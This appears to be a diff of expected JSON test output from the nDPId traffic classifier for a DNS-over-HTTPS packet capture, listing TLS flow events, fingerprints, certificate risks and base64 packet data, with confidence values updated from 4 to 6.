-00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="} -01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 